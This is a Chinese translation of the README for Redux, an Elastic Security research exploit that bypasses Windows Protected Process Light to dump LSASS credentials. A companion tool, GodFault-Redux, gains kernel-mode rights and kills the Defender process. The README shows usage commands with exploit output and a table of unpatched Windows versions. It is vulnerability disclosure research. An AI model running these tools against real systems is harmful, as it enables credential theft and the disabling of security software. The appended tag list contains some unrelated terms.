gabriellandau/Redux

# Redux 由 [Elastic Security](https://www.elastic.co/security-labs/) 的 [Gabriel Landau](https://twitter.com/GabrielLandau) 发布。 这是现已修补的 [PPLFault](https://github.com/gabriellandau/PPLFault) 漏洞利用的一个变种，它绕过了微软针对 PPLFault 的[缓解措施](https://www.elastic.co/security-labs/inside-microsofts-plan-to-kill-pplfault)。 ## Redux 利用 Windows Code Integrity 中的 TOCTOU 漏洞，以 WinTcb-Light 权限实现任意代码执行，随后转储指定进程。关于该漏洞利用的更多详情，请参阅我们的研究： - [The Immutable Illusion: Pwning Your Kernel with Cloud Files](https://www.elastic.co/security-labs/immutable-illusion) ### 演示 https://github.com/user-attachments/assets/b6d7bc20-18dc-4a77-a39e-c92f0c1a1fe1 ### 示例输出 ``` PS C:\Users\user\Desktop> cmd /c ver Microsoft Windows [Version 10.0.20348.4773] PS C:\Users\user\Desktop> $TargetPid = (Get-Process lsass).Id PS C:\Users\user\Desktop> (Get-NtProcess -Access QueryLimitedInformation -Pid $TargetPid).Protection Type Signer ---- ------ ProtectedLight Lsa PS C:\Users\user\Desktop> dir *.dmp PS C:\Users\user\Desktop> .\Redux.exe -v $TargetPid lsass.dmp [+] No cleanup necessary. Backup does not exist. [+] GetShellcode: 528 bytes of shellcode written over DLL entrypoint [+] Benign: C:\Windows\System32\EventAggregation.dll.bak [+] Payload: C:\PPLFaultTemp\PPLFaultPayload.dll [+] Placeholder: C:\PPLFaultTemp\EventAggregationPH.dll [+] Acquired exclusive oplock to file: C:\Windows\System32\devobj.dll [+] Ready. Spawning WinTcb. [+] SpawnPPL: Waiting for child process to finish. [+] FetchDataCallback called. [+] Hydrating 90112 bytes at offset 0 [+] Switching to payload [+] Give the memory manager a moment to think [+] Emptying system working set [+] Working set purged [+] FetchDataCallback called. [+] Hydrating 90112 bytes at offset 0 [+] Successfully hydrated file: C:\PPLFaultTemp\EventAggregationPH.dll [+] Dump saved to: lsass.dmp [+] Dump is 49.1 MB [+] Operation took 2109 ms PS C:\Users\user\Desktop> dir *.dmp Directory: C:\Users\user\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 2/11/2026 4:17 PM 51500633 lsass.dmp ``` ## GodFault-Redux 利用了与 Redux 相同的 TOCTOU 漏洞。然而，它不是转储进程，而是迁移到 CSRSS，并利用来自 [ANGRYORCHARD](https://github.com/gabriellandau/ANGRYORCHARD/blob/0a4720f7e07e86a9ac2783411b81efac14938e26/Exploit.c#L69-L81) 的 `win32k!NtUserHardErrorControlCall` 中的漏洞，将 `KTHREAD.PreviousMode` 从 `UserMode` (1) 递减为 `KernelMode` (0)。它通过结束一个通常无法被结束的进程（例如 `MsMpEng.exe`）来证明获得了“上帝模式 (God Mode)”权限。 ### 示例输出 ``` PS C:\Users\user\Desktop> (Get-Process MsMpEng).Id 844 PS C:\Users\user\Desktop> taskkill /f /pid 844 ERROR: The process with PID 844 could not be terminated. Reason: Access is denied. PS C:\Users\user\Desktop> .\GodFault-Redux.exe -k MsMpEng.exe [+] Thread 5668 (KTHREAD FFFFB9043ACB2080) has been blessed by GodFault [+] Initial blessing successful [+] Testing post-exploit ability to acquire PROCESS_ALL_ACCESS to System: Success [+] Opened \Device\PhysicalMemory. Handle is 0x14c [+] Opened System process as PROCESS_ALL_ACCESS. Handle is 0x148 [+] GodFault killed process 844: MsMpEng.exe PS C:\Users\user\Desktop> (Get-Process MsMpEng).Id Get-Process : Cannot find a process with the name "MsMpEng". Verify the process name and call the cmdlet again. At line:1 char:2 + (Get-Process MsMpEng).Id + ~~~~~~~~~~~~~~~~~~~ + CategoryInfo : ObjectNotFound: (MsMpEng:String) [Get-Process], ProcessCommandException + FullyQualifiedErrorId : NoProcessFoundForGivenName,Microsoft.PowerShell.Commands.GetProcessCommand ``` ## 截至 2026 年 2 月受影响的平台 | 操作系统 | 生命周期 | 修复状态 | | :---- | :---- | :---- | | Windows 11 24H2 | [主流支持](https://learn.microsoft.com/en-us/lifecycle/products/windows-11-home-and-pro) | ✔ 已修复 | | Windows 10 Enterprise LTSC 2021 | [主流支持](https://learn.microsoft.com/en-us/lifecycle/products/windows-10-enterprise-ltsc-2021) | ❌ 截至 2026 年 2 月仍可用 (19044.6937) | | Windows Server 2025 | [主流支持](https://learn.microsoft.com/en-us/lifecycle/products/windows-server-2025) | ✔ 已修复 | | Windows Server 2022 | [主流支持](https://learn.microsoft.com/en-us/lifecycle/products/windows-server-2022) | ❌ 截至 2026 年 2 月仍可用 (20348.4773) | | Windows Server 2019 | [扩展支持](https://learn.microsoft.com/en-us/lifecycle/products/windows-server-2019) | ❌ 截至 2026 年 2 月仍可用 (17763.8389) | # 许可证 Redux 采用 [ELv2 许可证](LICENSE.txt)。它使用了来自 SystemInformer 的 [phnt](https://github.com/winsiderss/systeminformer/tree/25846070780183848dc8d8f335a54fa6e636e281/phnt)，该库采用 [MIT 许可证](phnt/LICENSE.txt)。 # 致谢 Redux 基于我们先前的作品 [PPLFault](https://github.com/gabriellandau/PPLFault)，其灵感来源于 [Clément Labro](https://infosec.exchange/@itm4n) 的 [PPLdump](https://github.com/itm4n/PPLdump)。 [ANGRYORCHARD](https://github.com/gabriellandau/ANGRYORCHARD) 由 [Austin Hudson](https://twitter.com/ilove2pwn_) 创建，他在微软修补 PPLdump 时发布了它。

标签：C/C++, CVE 研究, Elastic Security, LSASS 转储, PPL 绕过, RFI远程文件包含, TOCTOU, UML, Web报告查看器, Windows 安全, WinTcb, 事务性I/O, 云文件攻击, 代码完整性, 内核漏洞, 凭据窃取, 协议分析, 反作弊绕过, 客户端加密, 客户端加密, 权限提升, 系统攻防